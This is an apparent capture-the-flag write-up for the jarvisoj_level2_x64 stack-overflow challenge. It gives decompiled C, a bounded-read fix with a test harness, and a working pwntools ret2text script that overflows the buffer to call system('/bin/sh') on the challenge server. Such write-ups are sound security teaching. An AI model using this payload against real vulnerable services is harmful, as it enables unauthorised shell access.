Solution approach:
Leaking or modifying memory data:
- Heap address: not needed
- Stack address: [[Stack上函数传参]]
- libc address: not needed
- BSS segment address: not needed
Hijacking program control flow: [[ret2text(栈溢出的gadgets利用)]]
Getting a shell or the flag: [[调用程序中的system]]
Lessons learned:
Challenge info:
```text
┌──(kali㉿kali)-[~/Desktop]
└─$ file jarvisoj_level2_x64
jarvisoj_level2_x64: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=17f0f0026ee70f2e0c8c600edcbe06862a9845bd, not stripped

┌──(kali㉿kali)-[~/Desktop]
└─$ checksec --file=jarvisoj_level2_x64
RELRO      STACK CANARY      NX          PIE     RPATH     RUNPATH     Symbols     FORTIFY  Fortified  Fortifiable  FILE
No RELRO   No canary found   NX enabled  No PIE  No RPATH  No RUNPATH  68 Symbols  No       0          1            jarvisoj_level2_x64
```
libc version:
Writeups referenced:
Core pseudocode analysis:
Exploitable code:
```c
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

/* Decompiler (IDA) output, annotated. buf is 128 bytes, but read() is
 * allowed up to 0x200 bytes, so input beyond 128 bytes overwrites the
 * saved rbp and then the return address. There is no stack canary
 * (see the checksec output above), so nothing detects the overwrite. */
ssize_t vulnerable_function()
{
  char buf[128]; // [rsp+0h] [rbp-80h] BYREF
  system("echo Input:");
  return read(0, buf, 0x200uLL);
}

// IDA prints this as `int __cdecl main(...)`; the __cdecl annotation is dropped so it compiles with gcc.
int main(int argc, const char **argv, const char **envp)
{
  vulnerable_function(argc, argv, envp); // decompiler artifact: the function takes no arguments
  return system("echo 'Hello World!'");
}
```
Analysis:
Use the stack overflow. The binary's string table already contains "/bin/sh", and there is an existing call to system (call_system) in the program; since the argument to system is passed in rdi, a `pop rdi; ret` gadget is needed to load the string address before jumping to that call.
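The fix from the defender's side, as an added example that is not part of the original writeup: the same 128-byte buffer, but the read is capped at sizeof(buf)-1, plus a constructed pipe harness (demo_bounded, a hypothetical name) that feeds the 0x200 bytes the binary accepted and checks that the word after the buffer, standing in for the saved rbp/return address, is left untouched.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define BUF_SIZE 128  /* same 128-byte buffer as vulnerable_function */
/* Hardened replacement for read(0, buf, 0x200): reads at most cap-1 bytes,
 * so input cannot run past the end of buf, and NUL-terminates the result.
 * Returns the number of bytes stored, or -1 on error. */
ssize_t read_input_bounded(int fd, char *buf, size_t cap)
{
    if (buf == NULL || cap == 0)
        return -1;
    ssize_t n = read(fd, buf, cap - 1);
    if (n < 0) {
        buf[0] = '\0';
        return -1;
    }
    buf[n] = '\0';
    return n;
}

/* Constructed harness (not part of the challenge): feeds input_len bytes of
 * 'A' through a pipe into a 128-byte buffer followed by a sentinel word that
 * stands in for the saved rbp / return address. Returns the bytes stored,
 * -1 on a system error, or -2 if the sentinel was overwritten. */
ssize_t demo_bounded(size_t input_len)
{
    struct { char buf[BUF_SIZE]; unsigned long sentinel; } frame;
    const unsigned long marker = 0xdeadbeefcafef00dUL;
    char fill[0x200];  /* 0x200 is the read size the binary allowed */
    int fds[2];
    frame.sentinel = marker;
    memset(fill, 'A', sizeof fill);
    if (input_len > sizeof fill)
        input_len = sizeof fill;
    if (pipe(fds) != 0)
        return -1;
    ssize_t written = write(fds[1], fill, input_len);
    close(fds[1]);
    ssize_t stored = (written == (ssize_t)input_len)
        ? read_input_bounded(fds[0], frame.buf, sizeof frame.buf) : -1;
    close(fds[0]);
    return frame.sentinel == marker ? stored : -2;
}
int main(void)
{
    printf("0x200 bytes in, %zd stored, frame intact\n", demo_bounded(0x200));
    return 0;
}
```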
Script:
```python
from pwn import *

context(log_level='debug', arch='amd64', os='linux')
pwnfile = './jarvisoj_level2_x64'
sh = remote('node4.buuoj.cn', 27038)
elf = ELF(pwnfile)
#sh = process(pwnfile)

bin_sh_addr = 0x600A90   # address of the "/bin/sh" string in the binary
call_system = 0x400603   # address of the existing call to system
pop_rdi_ret = 0x4006b3   # pop rdi; ret gadget, loads the first argument

# 0x88 = 128-byte buf + 8-byte saved rbp, then the return address is replaced by the chain
payload = 0x88*b'a' + p64(pop_rdi_ret) + p64(bin_sh_addr) + p64(call_system)
sh.sendline(payload)
#gdb.attach(sh)
#pause()
sh.interactive()
```